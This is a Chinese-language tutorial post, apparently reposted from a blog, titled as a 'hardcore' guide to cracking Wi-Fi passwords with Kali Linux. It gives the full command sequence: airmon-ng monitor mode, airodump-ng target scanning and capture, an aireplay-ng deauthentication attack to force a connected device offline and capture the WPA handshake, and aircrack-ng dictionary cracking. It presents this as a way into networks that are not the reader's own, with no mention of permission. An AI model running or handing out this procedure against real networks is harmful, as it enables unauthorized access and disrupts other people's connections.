admin管理员组文章数量:1619289
kali 破解wifi 硬核
- 大致思路
- 第一步
- 第二步
- 第三步
大致思路
我们在链接wifi网络的时候,是处在以波状态的世界里。在没有设置很强的防御路由器,我们在信号良好的状态下,时刻都是可以接收网络的。能够链接网络的前提是提前知道对方的网络信道和口令。为了避免很多网络相互碰撞就有了不同频率波下工作的Wi-Fi。
- 第一步,我们需要知道来源网络的名字(bssid,而不是Wi-Fi名字保证不会出现重复和非法字符),工作的信道。
- 第二步,抓住正常链接的握手包,这个包的作用是判断你是不是知道口令。(为什么不直接传输口令而是加密传输❓直接传输的话被类似于Wireshark的软件捕获,就会被直接获取密码)。
- 第三步,通过暴力破解的方法获取包内的密码。
了解大致思路之后用Linux 的命令对其每一步进行实现。
第一步
检查自己的Wi-Fi网口并使其进入监听模式,来获取当前环境下可以接受的Wi-Fi。
sudo airmon-ng start wlan0
可以看到无线网口的状态发生了改变。
sudo airodump-ng wlan0mon
通过这条命令我们接收到当前环境下的wifi及其状态
通过观察我们可以获取想要wifi的标识名及其状态。
第二步
我们在获取到标识符之后就开始监听模式,等待别人进行登陆Wi-Fi然后拦截handshake包,然后用这个包进行第三步,但这里有一个缺点就是我们需要等待。
根据设备连接网络的状态,一旦设备信号被洪范攻击就会进行offline 的状态并不断尝试重新连接,尝试重新连接的过程也会携带handshake包。因此我们可以尝试去攻击已经成功连接的设备使其进行自动重新连接。
sudo airodump-ng --bssid BC:46:99:77:90:07 -c 11 wlan0mon
我们就找到了连接这个wifi的设备数量,其工作状态,设备标识符。
然后对这个这个wifi进行监听收发的handshake包,同时对其进行攻击使其丢失包进行重连。
对指定的信道和标识符进行截取监听,并写入文件。
sudo airodump-ng -c 11 --bssid BC:46:99:77:90:07 -w hach wlan0mon
对指定的设备进行攻击,持续性工具会导致他人无法正常上网。
sudo aireplay-ng -0 20 -a BC:46:99:77:90:07 -c 1C:45:86:C9:BE:89 wlan0mon
这里就获得了handshake的对应字符
第三步
通过字典文件进行遍历破解。
sudo aircrack-ng -a 2 -b BC:46:99:77:90:07 -w Desktop/dict.txt hach-01.cap
这里的字典可以用一些小工具进行生成。
版权声明:本文标题:kali 破解无线密码 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:https://m.elefans.com/xitong/1728798672a1174285.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论